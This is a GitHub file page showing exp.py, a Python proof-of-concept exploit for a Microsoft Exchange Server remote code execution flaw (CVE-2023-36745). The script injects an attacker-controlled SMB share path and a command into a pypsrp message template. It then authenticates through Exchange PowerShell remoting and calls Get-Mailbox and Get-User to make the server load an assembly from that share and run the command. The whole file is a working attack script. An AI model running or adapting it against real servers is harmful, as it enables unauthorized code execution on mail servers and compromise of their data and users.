forked from N1k0la-T/CVE-2023-36745
-
Notifications
You must be signed in to change notification settings - Fork 0
/
exp.py
108 lines (103 loc) · 3.05 KB
/
exp.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
import argparse
def modifyPypsrp(assemblyLoadPath, command):
msg = ""
with open("pypsrp/messages.py.tpl") as f:
msg = f.read()
with open("pypsrp/messages.py", "w") as f:
msg = msg.replace("$$assemblyLoadPath$$", assemblyLoadPath)
msg = msg.replace("$$command$$", command)
f.write(msg)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Microsoft Exchange Server CVE-2023-36745 RCE PoC\nExample: python3 exp.py -H exchange.webdxg.com -u webdxg.com\\dddai -p 4IDF7LAU -s \\\\192.168.237.131\\Shares\\ -c calc.exe"
)
parser.add_argument(
"-H",
dest="host",
action="store",
type=str,
help="netbios, eg. exchange.webdxg.com",
required=True,
)
parser.add_argument(
"-u",
dest="username",
action="store",
type=str,
help="username, eg. webdxg.com\\dddai",
required=True,
)
parser.add_argument(
"-p",
dest="password",
action="store",
type=str,
help="password, eg. 4IDF7LAU",
required=True,
)
parser.add_argument(
"-s",
dest="smb",
action="store",
type=str,
help="smb, eg. \\\\192.168.237.131\\Shares\\",
required=True,
)
parser.add_argument(
"-c",
dest="cmd",
action="store",
type=str,
help="command, eg. calc.exe",
required=True,
)
args = parser.parse_args()
host = args.host
username = args.username
password = args.password
smb = args.smb.replace("\\", "\\\\")
cmd = args.cmd
modifyPypsrp(smb, cmd)
from pypsrp.powershell import PowerShell, RunspacePool
from pypsrp.wsman import WSMan
wsman = WSMan(
server=host,
username=username,
password=password,
path="powershell",
ssl=False,
port=80,
auth="kerberos",
scheme="http",
)
with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
ps = PowerShell(pool)
ps.add_cmdlet("Get-Mailbox").add_argument("")
ps.invoke()
errors = "\n".join([str(s) for s in ps.streams.error])
# print(errors)
wsman.close()
wsman = WSMan(
server=host,
username=username,
password=password,
path="powershell",
ssl=False,
port=80,
auth="kerberos",
scheme="http",
)
with RunspacePool(wsman, configuration_name="Microsoft.Exchange") as pool:
ps = PowerShell(pool)
ps.add_cmdlet("Get-User").add_argument("")
ps.invoke()
errors = "\n".join([str(s) for s in ps.streams.error])
# print(errors)
if (
'Cannot convert the "Microsoft.Exchange.Data.MultiValuedProperty`1[FUSE.Paxos.Class1]"'
in errors
):
print("[+]All seems fine")
else:
print("[-]Check it manually")
wsman.close()